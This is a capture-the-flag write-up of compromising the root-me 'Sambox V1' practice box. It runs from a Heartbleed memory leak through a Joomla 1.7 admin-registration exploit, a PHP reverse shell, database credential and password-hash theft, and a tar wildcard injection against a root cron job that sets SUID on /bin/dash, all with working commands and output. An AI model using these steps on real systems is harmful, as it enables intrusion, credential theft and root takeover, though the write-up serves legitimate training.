Sambox V1
time taken: many days and many nights

nmap:

Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-02 16:10 MDT
Warning: 212.129.29.185 giving up on port because retransmission cap hit (2).
Nmap scan report for ctf03.root-me.org (212.129.29.185)
Host is up (0.099s latency).
Not shown: 65532 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4 (protocol 2.0)
| ssh-hostkey: 
|   1024 7f:4d:e9:99:30:0a:21:5a:17:e7:d8:41:22:fa:a4:ca (DSA)
|   2048 fb:73:32:ac:af:94:10:40:03:ea:71:46:b9:cb:9e:8e (RSA)
|_  256 8d:b9:b6:e1:1f:c7:da:09:ac:c6:6d:c4:22:90:ea:d6 (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=sambox
| Not valid before: 2014-12-07T12:52:34
|_Not valid after:  2024-12-04T12:52:34
|_ssl-date: 2017-08-02T22:18:46+00:00; +1s from scanner time.
Aggressive OS guesses: QEMU user mode network gateway (96%), Konica Minolta 7035 printer (87%), Bay Networks BayStack 450 switch (software version 3.1.0.22) (87%), Bay Networks BayStack 450 switch (software version 4.2.0.16) (87%), GNU Hurd 0.3 (87%), Allied Telesyn AT-9006SX/SC switch (86%), Cabletron ELS100-24TXM Switch or Icom IC-7800 radio transceiver (86%), Cisco Catalyst 1900 switch or RAD IPMUX-1 TDM-over-IP multiplexer (86%), HP 9100c Digital Sender printer (J3113A) (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT     ADDRESS
1   0.46 ms 10.0.2.2
2   0.35 ms ctf03.root-me.org (212.129.29.185)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 527.13 seconds


can't see anything on port 80 other than the generic "It works!" apache decal. 
let's finally try some nmap scripts on the TLS apache port:

root@kali:~/ctf_shit/sambox_v1# nmap -sV -p 443 --script=ssl-heartbleed ctf02.root-me.org
Starting Nmap 7.40 ( https://nmap.org ) at 2017-08-03 15:57 MDT
Nmap scan report for ctf02.root-me.org (212.129.28.21)
Host is up (0.038s latency).
PORT    STATE SERVICE VERSION
443/tcp open  ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.2.22 (Debian)
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       http://www.openssl.org/news/secadv_20140407.txt 
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|_      http://cvedetails.com/cve/2014-0160/

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.68 seconds


AHA!

metasploit time:

msf auxiliary(openssl_heartbleed) > show options

Module options (auxiliary/scanner/ssl/openssl_heartbleed):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DUMPFILTER                         no        Pattern to filter leaked memory before storing
   MAX_KEYTRIES      50               yes       Max tries to dump key
   RESPONSE_TIMEOUT  10               yes       Number of seconds to wait for a server response
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             443              yes       The target port (TCP)
   STATUS_EVERY      5                yes       How many retries until status
   THREADS           1                yes       The number of concurrent threads
   TLS_CALLBACK      None             yes       Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
   TLS_VERSION       1.0              yes       TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)


Auxiliary action:

   Name  Description
   ----  -----------
   SCAN  Check hosts for vulnerability


msf auxiliary(openssl_heartbleed) > set RHOSTS 212.129.28.21
RHOSTS => 212.129.28.21
msf auxiliary(openssl_heartbleed) > set threads 5
threads => 5
msf auxiliary(openssl_heartbleed) > set verbose true
verbose => true
msf auxiliary(openssl_heartbleed) > run

[*] 212.129.28.21:443     - Sending Client Hello...
[*] 212.129.28.21:443     - SSL record #1:
[*] 212.129.28.21:443     - 	Type:    22
[*] 212.129.28.21:443     - 	Version: 0x0301
[*] 212.129.28.21:443     - 	Length:  86
[*] 212.129.28.21:443     - 	Handshake #1:
[*] 212.129.28.21:443     - 		Length: 82
[*] 212.129.28.21:443     - 		Type:   Server Hello (2)
[*] 212.129.28.21:443     - 		Server Hello Version:           0x0301
[*] 212.129.28.21:443     - 		Server Hello random data:       59839dcd973bb251b9c6402c517f2883d3d6c23f3b423ec9ed6fc5924963754a
[*] 212.129.28.21:443     - 		Server Hello Session ID length: 32
[*] 212.129.28.21:443     - 		Server Hello Session ID:        31c9ca2932977b3b79449a64a6ab19567740a25927d95ceb6eadb6b95fceb9a2
[*] 212.129.28.21:443     - SSL record #2:
[*] 212.129.28.21:443     - 	Type:    22
[*] 212.129.28.21:443     - 	Version: 0x0301
[*] 212.129.28.21:443     - 	Length:  704
[*] 212.129.28.21:443     - 	Handshake #1:
[*] 212.129.28.21:443     - 		Length: 700
[*] 212.129.28.21:443     - 		Type:   Certificate Data (11)
[*] 212.129.28.21:443     - 		Certificates length: 697
[*] 212.129.28.21:443     - 		Data length: 700
[*] 212.129.28.21:443     - 		Certificate #1:
[*] 212.129.28.21:443     - 			Certificate #1: Length: 694
[*] 212.129.28.21:443     - 			Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name:0x007f92345de080>, issuer=#<OpenSSL::X509::Name:0x007f92345de0a8>, serial=#<OpenSSL::BN:0x007f92345de0d0>, not_before=2014-12-07 12:52:34 UTC, not_after=2024-12-04 12:52:34 UTC>
[*] 212.129.28.21:443     - SSL record #3:
[*] 212.129.28.21:443     - 	Type:    22
[*] 212.129.28.21:443     - 	Version: 0x0301
[*] 212.129.28.21:443     - 	Length:  525
[*] 212.129.28.21:443     - 	Handshake #1:
[*] 212.129.28.21:443     - 		Length: 521
[*] 212.129.28.21:443     - 		Type:   Server Key Exchange (12)
[*] 212.129.28.21:443     - SSL record #4:
[*] 212.129.28.21:443     - 	Type:    22
[*] 212.129.28.21:443     - 	Version: 0x0301
[*] 212.129.28.21:443     - 	Length:  4
[*] 212.129.28.21:443     - 	Handshake #1:
[*] 212.129.28.21:443     - 		Length: 0
[*] 212.129.28.21:443     - 		Type:   Server Hello Done (14)
[*] 212.129.28.21:443     - Sending Heartbeat...
[*] 212.129.28.21:443     - Heartbeat response, 65535 bytes
[+] 212.129.28.21:443     - Heartbeat response with leak
[*] 212.129.28.21:443     - Printable info leaked:

(snippet):

(....p............se....................0............................7J.............0.!.Q.....................................V.................;........p..........P...!............................:..Q...H...h................... ...0...........4....u......X............)......P...................a.... ......3.......3..........Y..../var/www/9cc241ad23332e598db0f9d52ced5850/index.php.....`.......h...@...@...............x...@...@...................@...@...........q....Ug..Ug..................................................................................................................................... repeated 243 times .....................................................................................................................................i...PTg.PTg......... ...(...P.......X................?......H...(...(...A.........ra................p...h...F.E.....@.......@..........Y..../var/www/9cc241ad23332e598db0f9d52ced5850/includes/framework.php....q....##P....>.......>..........Y..../var/www/9cc241ad23332e598db0f9d52ced5850/includes/version.php..........p...Q.......p... ...A............... ... .................................pE.............&..G,.....r.H......IS.T.4~~*QE..)g...N.....N.<.2Bo..1..m..]....o.......O...7..$v(..M.{y..#.'..m)I'...K9.0......4.../.TO.L...-......y...`Tg. ....................................................................................................Sg..Sg.x...X......A....3.......3..........Y..../var/www/9cc241ad23332e598db0f9d52ced5850/libraries.i...Kr.L ...>... ...>..........Y..../var/www/9cc241ad23332e598db0f9d52ced5850/libraries/import.php......A...(Ug.(Ug.....................................................................................................................................................................................................................................................................1........Tg......T..........................@...h....e......@.......@..........Y..../var/www/9cc241ad23332e598db0f9d52ced5850/libraries/platform.php....Y...@Tg.

whoa!!! MEMORY LEAK

useful stuff here:

f4c5d9e6517d485592ccf7367c7169de -- possible md5 hash?
var/www/9cc241ad23332e598db0f9d52ced5850/libraries/platform.php
var/www/9cc241ad23332e598db0f9d52ced5850/libraries/import.php


root@kali:~/ctf_shit/sambox_v1# hashid
9cc241ad23332e598db0f9d52ced5850
Analyzing '9cc241ad23332e598db0f9d52ced5850'
[+] MD2 
[+] MD5 
.
.

root@kali:~/ctf_shit/sambox_v1# hashid
f4c5d9e6517d485592ccf7367c7169de
Analyzing 'f4c5d9e6517d485592ccf7367c7169de'
[+] MD2 
[+] MD5 
[+] MD4 



root@kali:~/dirsearch# ./dirsearch.py -u http://ctf02.root-me.org/9cc241ad23332e598db0f9d52ced5850/ -e .php

 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )

Extensions: .php | Threads: 10 | Wordlist size: 5151

Error Log: /root/dirsearch/logs/errors-17-08-03_16-08-36.log

Target: http://ctf02.root-me.org/9cc241ad23332e598db0f9d52ced5850/

[16:08:37] Starting: 

[16:09:08] 200 -   17KB - /9cc241ad23332e598db0f9d52ced5850/LICENSE.txt
[16:09:10] 200 -    4KB - /9cc241ad23332e598db0f9d52ced5850/README
[16:09:10] 200 -    4KB - /9cc241ad23332e598db0f9d52ced5850/README.txt
[16:09:45] 301 -  363B  - /9cc241ad23332e598db0f9d52ced5850/administrator  ->  http://ctf02.root-me.org/9cc241ad23332e598db0f9d52ced5850/administrator/
[16:09:45] 200 -    4KB - /9cc241ad23332e598db0f9d52ced5850/administrator/
[16:09:45] 403 -  341B  - /9cc241ad23332e598db0f9d52ced5850/administrator/.htaccess
[16:10:02] 301 -  355B  - /9cc241ad23332e598db0f9d52ced5850/cache  ->  http://ctf02.root-me.org/9cc241ad23332e598db0f9d52ced5850/cache/
[16:10:02] 200 -   31B  - /9cc241ad23332e598db0f9d52ced5850/cache/
[16:10:08] 301 -  360B  - /9cc241ad23332e598db0f9d52ced5850/components  ->  http://ctf02.root-me.org/9cc241ad23332e598db0f9d52ced5850/components/
[16:10:11] 200 -    0B  - /9cc241ad23332e598db0f9d52ced5850/configuration.php
[16:10:32] 200 -    3KB - /9cc241ad23332e598db0f9d52ced5850/htaccess.txt
[16:10:34] 301 -  356B  - /9cc241ad23332e598db0f9d52ced5850/images  ->  http://ctf02.root-me.org/9cc241ad23332e598db0f9d52ced5850/images/
[16:10:35] 301 -  358B  - /9cc241ad23332e598db0f9d52ced5850/includes  ->  http://ctf02.root-me.org/9cc241ad23332e598db0f9d52ced5850/includes/
[16:10:35] 200 -   31B  - /9cc241ad23332e598db0f9d52ced5850/includes/
[16:10:42] 301 -  358B  - /9cc241ad23332e598db0f9d52ced5850/language  ->  http://ctf02.root-me.org/9cc241ad23332e598db0f9d52ced5850/language/
[16:10:43] 301 -  359B  - /9cc241ad23332e598db0f9d52ced5850/libraries  ->  http://ctf02.root-me.org/9cc241ad23332e598db0f9d52ced5850/libraries/
[16:10:43] 200 -   31B  - /9cc241ad23332e598db0f9d52ced5850/libraries/phpmailer/
[16:10:46] 301 -  354B  - /9cc241ad23332e598db0f9d52ced5850/logs  ->  http://ctf02.root-me.org/9cc241ad23332e598db0f9d52ced5850/logs/
[16:10:47] 200 -   31B  - /9cc241ad23332e598db0f9d52ced5850/logs/
[16:10:49] 301 -  355B  - /9cc241ad23332e598db0f9d52ced5850/media  ->  http://ctf02.root-me.org/9cc241ad23332e598db0f9d52ced5850/media/
[16:10:52] 301 -  357B  - /9cc241ad23332e598db0f9d52ced5850/modules  ->  http://ctf02.root-me.org/9cc241ad23332e598db0f9d52ced5850/modules/
[16:11:09] 301 -  357B  - /9cc241ad23332e598db0f9d52ced5850/plugins  ->  http://ctf02.root-me.org/9cc241ad23332e598db0f9d52ced5850/plugins/
[16:11:15] 200 -  865B  - /9cc241ad23332e598db0f9d52ced5850/robots.txt
[16:11:34] 200 -   31B  - /9cc241ad23332e598db0f9d52ced5850/templates/
[16:11:34] 301 -  359B  - /9cc241ad23332e598db0f9d52ced5850/templates  ->  http://ctf02.root-me.org/9cc241ad23332e598db0f9d52ced5850/templates/
[16:11:37] 301 -  353B  - /9cc241ad23332e598db0f9d52ced5850/tmp  ->  http://ctf02.root-me.org/9cc241ad23332e598db0f9d52ced5850/tmp/
[16:11:37] 200 -   31B  - /9cc241ad23332e598db0f9d52ced5850/tmp/
[16:11:44] 200 -    2KB - /9cc241ad23332e598db0f9d52ced5850/web.config
[16:11:45] 200 -    2KB - /9cc241ad23332e598db0f9d52ced5850/web.config.txt

Task Completed

admin login here!!!

http://ctf02.root-me.org/9cc241ad23332e598db0f9d52ced5850/administrator/

also found this in view source: <input type="hidden" name="17900699c67efa7f2702752198cfae29" value="1" />	</fieldset>

turns out to be some sort of security token..

http://ctf02.root-me.org/9cc241ad23332e598db0f9d52ced5850/robots.txt:

# If the Joomla site is installed within a folder such as at
# e.g. www.example.com/joomla/ the robots.txt file MUST be
# moved to the site root at e.g. www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to the disallowed
# path, e.g. the Disallow rule for the /administrator/ folder
# MUST be changed to read Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/orig.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /logs/
Disallow: /media/
Disallow: /modules/
Disallow: /plugins/
Disallow: /templates/
Disallow: /tmp/


seems to be running joomla...let's get the version:

msf auxiliary(joomla_version) > show options

Module options (auxiliary/scanner/http/joomla_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the Joomla application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(joomla_version) > set RHOSTS 212.129.28.21
RHOSTS => 212.129.28.21
msf auxiliary(joomla_version) > set targeturi /9cc241ad23332e598db0f9d52ced5850/
targeturi => /9cc241ad23332e598db0f9d52ced5850/
msf auxiliary(joomla_version) > run

[*] Server: Apache/2.2.22 (Debian)
[*] Joomla version: 1.7.3
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


using inspect element, a couple of things can be unearthed:

		<div class="clr"></div>
		<input type="submit" class="hidebtn" value="Connexion" />
		<input type="hidden" name="option" value="com_login" />
		<input type="hidden" name="task" value="login" />
		<input type="hidden" name="return" value="aW5kZXgucGhwP2lkPTE=" />
		<input type="hidden" name="0d226e8395e2f9c663c4c719f45a6a01" value="1" />


The most recent request was denied because it contained an invalid security token. Please refresh the page and try again.


using Burpsuite, these requests and responses were found to be somewhat successful in identifying that hash as a session ID:

GET /9cc241ad23332e598db0f9d52ced5850/administrator/index.php HTTP/1.1
Host: ctf01.root-me.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://ctf01.root-me.org/9cc241ad23332e598db0f9d52ced5850/administrator/index.php
Cookie: 2c45078eefcd34a9c86128a8d952fc9c=f4c5d9e6517d485592ccf7367c7169de; de327a8ccce0f31f8571e04912046ec8=hnk9uga54jeo4f7f4asiliptn2
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

POST /9cc241ad23332e598db0f9d52ced5850/administrator/index.php HTTP/1.1
Host: ctf01.root-me.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://ctf01.root-me.org/9cc241ad23332e598db0f9d52ced5850/administrator/index.php
Cookie: 2c45078eefcd34a9c86128a8d952fc9c=edkgsfv8s9s020m3ecgufg2ms1; de327a8ccce0f31f8571e04912046ec8=f4c5d9e6517d485592ccf7367c7169de
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 116

username=admin&passwd=admin&lang=&option=com_login&task=login&return=aW5kZXgucGhw&b6a333ad5d72c73bf687264281172176=1

.
.
.
    <div id="content-box">
      <div id="element-box" class="login">
        <div class="m wbg">
          <h1>Connexion à l'administration de Joomla!</h1>
          <div id="system-message-container">
            <dl id="system-message">
              <dt class="message">Message</dt>
              <dd class="message message">
                <ul>
                  <li>Votre session a expiré. Veuillez vous reconnecter.</li> --> translates to basically "Your session has expired. Please log in again"
                </ul>
              </dd>
            </dl>
          </div>
          <div id="section-box">
.
.
.    

so at least we know that 'f4c5d9e6517d485592ccf7367c7169de' was, at some point, a valid 
user (possibly admin?) session cookie...

can't use XSS vulns found in Joomla 1.5x due to URL values always gettign base64 encoded -.-

after some serious digging, I came across this site:

http://jeffchannell.com/Joomla/joomla-161725-privilege-escalation-vulnerability.html

a vulnerability exists in Joomla 1.7.x that can be exploited to gain admin privileges in the CMS:

1) Go to registration page at http://ctf01.root-me.org/9cc241ad23332e598db0f9d52ced5850/index.php?option=com_users&view=registration 
2) Register as normal, EXCEPT make sure the passwords do not match up
3) in Burpsuite/Tamper Data, make sure to add the following POST param:
	 jform[groups][]=7

4) Submit registration request. It will obviously fail due to password mismatch
	but behind the scenes, the group data for this failed 		
	registration attempt will be added to session data to be 		
	carried through to the next registration request.

5) Submit the request again with Tamper Data intercepting all requests, this time with matching passwords. Re-add the "jform[groups][]=7" POST param.
	Now, the previously stored session data, containing group 		
	data, will be assigned to the "Administrator" group of Joomla 		
	as the registration procedure assigns the groups to ANY group 		
	already registered, instead of groups specified in the request.

6) Enjoy your new Admin account!
	
do all of that, and then HOLY FUCKING SHIT WE'RE IN:

rekt 	Administrator 	43 	2017-08-08 08:33:34 	

SHELL TIME:

upload in Extensions -> Upload package file

you will get an error claiming that an "Unknown Archive type" has been uploaded, don't
pay attention to this. go to ctf01.root-me.org/9cc241ad23332e598db0f9d52ced5850/tmp/php-reverse-shell.php
and have fun with your shell!

root@kali:~/ctf_shit/sambox_v1# nc -nvlp 32928
listening on [any] 32928 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.2] 56886
Linux sambox 3.2.0-4-486 #1 Debian 3.2.46-1 i686 GNU/Linux
 10:58:15 up 33 min,  0 users,  load average: 0.00, 0.01, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ $ gcc
/bin/sh: 8: gcc: not found

oh shit. no gcc?? look's like this will be harder than I thought.


let's get a more capable shell:
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@sambox:/home$ 

www-data@sambox:/$ cat /etc/passwd | grep /bin/sh
cat /etc/passwd | grep /bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh

www-data@sambox:/$ cat /etc/passwd | grep /bin/bash
cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash

ok no one in /home, so those don't seem like real users aside from root.

www-data@sambox:/selinux$ last
last
root     pts/0        10.66.1.1        Tue Aug  8 10:25 - 10:25  (00:00)    
root     pts/0        10.66.1.1        Tue Aug  8 10:25 - 10:25  (00:00)    
root     pts/0        10.66.1.1        Tue Aug  8 10:25 - 10:25  (00:00)    
reboot   system boot  3.2.0-4-486      Tue Aug  8 10:25 - 11:43  (01:18)    
root     tty1                          Thu Jan 15 21:50 - down   (00:01)    
reboot   system boot  3.2.0-4-486      Thu Jan 15 21:48 - 21:52  (00:03)    
reboot   system boot  3.2.0-4-486      Thu Jan 15 12:38 - 21:52  (09:13) 
.
.
.
confirms this

www-data@sambox:/$ sudo
sudo
bash: sudo: command not found

no sudo for www-data?????????

www-data@sambox:/$ su
su
Password: 

but we do have su....

let's have another look around...

what's this?

www-data@sambox:/var/www/9cc241ad23332e598db0f9d52ced5850$ cat configuration.php
.
.
.
	public $dbtype = 'mysqli';
	public $host = 'localhost';
	public $user = 'joomla';
	public $password = 'pZV56Vx48jvQLTaE';
	public $db = 'joomla';
	public $dbprefix = 'i3p4i_';
	public $live_site = '';
	public $secret = 'CzWA84Z5zDqWulCQ';
.
.
.
www-data@sambox:/var/www/9cc241ad23332e598db0f9d52ced5850$ mysql -u joomla -ppZV56Vx48jvQLTaE -h localhost   
<5850$ mysql -u joomla -ppZV56Vx48jvQLTaE -h localhost                       
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 118
Server version: 5.5.31-0+wheezy1 (Debian)

Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> select system_user();
select system_user();
+------------------+
| system_user()    |
+------------------+
| joomla@localhost |
+------------------+
1 row in set (0.00 sec)

ooo valid mysql credentials!

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| joomla             |
| test               |
+--------------------+
3 rows in set (0.00 sec)


interesting...

mysql> use joomla
use joomla
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-------------------------------+
| Tables_in_joomla              |
+-------------------------------+
| i3p4i_assets                  |
.
.
.
| i3p4i_users                   |
| i3p4i_viewlevels              |
| i3p4i_weblinks                |
+-------------------------------+
34 rows in set (0.00 sec)

mysql> select username, password from i3p4i_users;
select username, password from i3p4i_users;
+----------+-------------------------------------------------------------------+
| username | password                                                          |
+----------+-------------------------------------------------------------------+
| admin    | 77ddba4944e2c22380c26368737f164d:bYspba2brfxHX1t2jdiJrdMhHrYkKiKK |
| rekt     | 0f8a759fa330db932c6aed796edd6360:HYgSwpWSJtV9hwHcwWlpc2Pfd2ak5gNc |
+----------+-------------------------------------------------------------------+
2 rows in set (0.00 sec)


"rekt" is my admin account that I made earlier..let's break the original admin's password..
it looks like the admin has mail.. get into his account and check it out?

ok John the Ripper is taking a while with those password hashes..why not change admin's password to ours?

mysql> update i3p4i_users set password='4fe18504f122d77f1b51e013c0aaae77:q8hDBjwkxBLy9ysEfzlKyvBtdlQluzFi' where id=42
<77f1b51e013c0aaae77:q8hDBjwkxBLy9ysEfzlKyvBtdlQluzFi' where id=42;           

Query OK, 1 row affected (0.00 sec)
Rows matched: 1  Changed: 1  Warnings: 0

login with admin:password to the Jooml CMS...it works!

aaaaaaaaand nothing of use there...

none of the creds (joomla, the actual password hashes, etc) work for ssh. 
works for phpmyadmin though, but that's not of much use at this stage.

www-data@sambox:/$ mysql --version
mysql --version
mysql  Ver 14.14 Distrib 5.5.31, for debian-linux-gnu (i686) using readline 6.2

the fact that we don't have /usr/bin/sudo is pretty bad (and weird, this is the first time I've seen this. 
no gcc either. they are trying to make this hard). This means we can't use certain mysql exploits that use sudo,
even though this version of MySQL seems vulnerable to a few exploits...

ok let's go back to the / directory and see if there is anything of use...

interesting directory called /backup, with this interesting file:

www-data@sambox:/backup$ cat supervision.sh
cat supervision.sh
#!/bin/bash
# crontab every 1 minute

IP=$(/sbin/ifconfig | grep 'Bcast' | awk -F':' '{print $2}' | tr -d ' Bcast' | tail -1 | tr -d '\n')
INDEX=$(wget https://${IP}/9cc241ad23332e598db0f9d52ced5850/index.php --no-check-certificate -O /tmp/index 2>&1)

VERIF=$(md5sum /tmp/index | awk '{print $1}')
MD5SUM=$(tail -1 /root/tmp_md5.txt)
echo $VERIF

if [[ $VERIF == $MD5SUM ]]
  then
        echo OUI
  else
        echo $VERIF > /root/tmp_md5.txt
        cd /var/www/9cc241ad23332e598db0f9d52ced5850
        tar czf /backup/archive_old.tar.gz *
	mysqldump -u joomla --password=pZV56Vx48jvQLTaE --databases joomla > /backup/joomla.sql
        rm /tmp/index
fi

so every minute, this script downloads the homepage of the blog, makes a MD5 hash of it, and
compares this hash with one already in /root (which I presume is an older hash of the
homepage). if the two hashes are the same, the script simply echoes "oui" (no backup needed - the homepages are the same),
if not, then a backup process starts, where the /var/www/9cc241ad23332e598db0f9d52ced5850 
directory (containing all files for the blog) is tar'd, and the joomla database is backed up.

After MUCH further study, I realized that the fact that the tar command uses a wildcard 
may mean that we can leverage this script for privesc.

The /var/www/9cc241ad23332e598db0f9d52ced5850 directory is writable, so we may be able
to introduce certain files that will be tarred with the rest of the directory upon backup.

The "--checkpoint-action" command can be introduced into this directory. This command is a tar option
that allows us to execute code on behalf of the user executing tar, which is root in our case, as
supervision.sh is owned by root.

Breakdown of commands:

(this must be done in the /var/www/9cc241ad23332e598db0f9d52ced5850 directory as that
is the directory that will be backed up by supervision.sh)

1) "echo > --checkpoint=1;" --> creates a "checkpoint" for tar to look for in the directory.
2) "echo > --checkpoint-action=exec=sh\ shell.sh;" --> tells tar to execute our "shell".
3) "echo 'chmod u+s /bin/dash' > shell.sh" --> fills our "shell" with an actual shell (/bin/dash),
    also inhereting the ownership of /bin/dash (which is root).
4) "chmod +x shell.sh" --> makes our shell executable the next time tar runs as root.

now all we need to do is wait a minute, and (per the code in supervision.sh)
edit the /index.php (homepage) of the blog (by adding a new post, or changing the theme, or whatever
using the blog's CMS that we broke into earlier) so as to trigger the 
backup clause in the "if" statement after one minute.

after this, shell.sh will be executed in the context of root by tar.
so execute /bin/dash, and you have your root shell for the www-data user!

www-data@sambox:/var/www/9cc241ad23332e598db0f9d52ced5850$ ls
ls
LICENSE.txt    components	  index.php  modules	 tmp
README.txt     configuration.php  language   plugins	 web.config.txt
administrator  htaccess.txt	  libraries  robots.txt
cache	       images		  logs	     templates
cli	       includes		  media      test_1.txt
www-data@sambox:/var/www/9cc241ad23332e598db0f9d52ced5850$ echo > --checkpoint=1;
<c241ad23332e598db0f9d52ced5850$ echo > --checkpoint=1;                      
www-data@sambox:/var/www/9cc241ad23332e598db0f9d52ced5850$ echo > --checkpoint-action=exec=sh\ shell.sh;
<5850$ echo > --checkpoint-action=exec=sh\ shell.sh;                         
www-data@sambox:/var/www/9cc241ad23332e598db0f9d52ced5850$ echo 'chmod u+s /bin/dash' > shell.sh
<c241ad23332e598db0f9d52ced5850$ echo 'chmod u+s /bin/dash' > shell.sh       
www-data@sambox:/var/www/9cc241ad23332e598db0f9d52ced5850$ chmod +x shell.sh
chmod +x shell.sh
www-data@sambox:/var/www/9cc241ad23332e598db0f9d52ced5850$ ls -al
ls -al
total 124
-rw-rw-rw-  1 www-data www-data     1 Aug 16 07:22 --checkpoint-action=exec=sh shell.sh
-rw-rw-rw-  1 www-data www-data     1 Aug 16 07:22 --checkpoint=1
drwxr-xr-x 16 www-data www-data  4096 Aug 16 07:22 .
drwxr-xr-x  3 root     root      4096 Dec  7  2014 ..
-rw-r--r--  1 www-data www-data 17816 Dec 12  2009 LICENSE.txt
-rw-r--r--  1 www-data www-data  4244 Sep 25  2011 README.txt
drwxr-xr-x 10 www-data www-data  4096 Nov 13  2011 administrator
drwxr-xr-x  2 www-data www-data  4096 Nov 13  2011 cache
drwxr-xr-x  2 www-data www-data  4096 Nov 13  2011 cli
drwxr-xr-x 12 www-data www-data  4096 Nov 13  2011 components
-rw-r--r--  1 www-data www-data  1780 Dec  7  2014 configuration.php
-rw-r--r--  1 www-data www-data  3189 Apr  7  2011 htaccess.txt
drwxr-xr-x  4 www-data www-data  4096 Nov 13  2011 images
drwxr-xr-x  2 www-data www-data  4096 Nov 13  2011 includes
-rw-r--r--  1 www-data www-data  1389 Feb 21  2011 index.php
drwxr-xr-x  5 www-data www-data  4096 Nov 14  2011 language
drwxr-xr-x  7 www-data www-data  4096 Nov 13  2011 libraries
drwxr-xr-x  2 www-data www-data  4096 Nov 13  2011 logs
drwxr-xr-x  8 www-data www-data  4096 Nov 13  2011 media
drwxr-xr-x 25 www-data www-data  4096 Nov 13  2011 modules
drwxr-xr-x 10 www-data www-data  4096 Nov 13  2011 plugins
-rw-r--r--  1 www-data www-data   865 Sep 20  2011 robots.txt
